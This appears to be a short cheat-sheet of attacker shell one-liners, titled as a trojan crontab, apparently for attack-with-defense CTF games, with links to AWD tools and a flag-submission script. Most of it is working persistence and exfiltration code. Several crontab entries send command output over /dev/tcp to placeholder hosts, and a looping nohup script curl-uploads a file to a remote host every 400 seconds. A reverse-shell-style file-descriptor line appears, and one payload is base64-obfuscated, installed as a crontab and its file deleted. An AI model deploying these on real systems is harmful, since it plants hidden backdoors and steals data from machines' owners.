muma_crontab

[wangzh0ng]

echo '/4 * test ls >/dev/tcp/xxx/xxx' >~.s &crontab ~.s crontab -r

echo -e 'while 1\ndo\ncurl xxx:xxx -F "a=@file" -m 2\nsleep 400\ndone'>~.sh.rc &chmod +x ~.sh.rc&nohup ~.sh.rc&

[wangzh0ng]

http://wiki.7ell.me/#!skill/php.md

[wangzh0ng]

http://123.207.33.33/tmp/awd.7z http://123.207.33.33/tmp/awd_static.zip https://github.com/secgroup/flower

[wangzh0ng]

https://github.com/xiongpanju/ctf_awd_tools/blob/master/download_submit_flag.py

[wangzh0ng]

echo ' * test cat /tmp/ccc > /dev/tcp/xxxxxxx/3333 2>&1 ' > ccc && crontab ccc && crontab -l

[wangzh0ng]

echo -e ' * test 0<&196;exec 196>/dev/tcp/127.0.0.1/3333; pwd >&196 2>&196 ' > ccc && crontab ccc && crontab -l

[wangzh0ng]

echo 'KiAqICogKiAqIHRlc3QgMDwmMTk2O2V4ZWMgMTk2Pi9kZXYvdGNwLzEyNy4wLjAuMS8zMzMzO3B3ZD4mMTk2Cg==' |base64 -d > ccc && crontab ccc&&rm ccc && crontab -l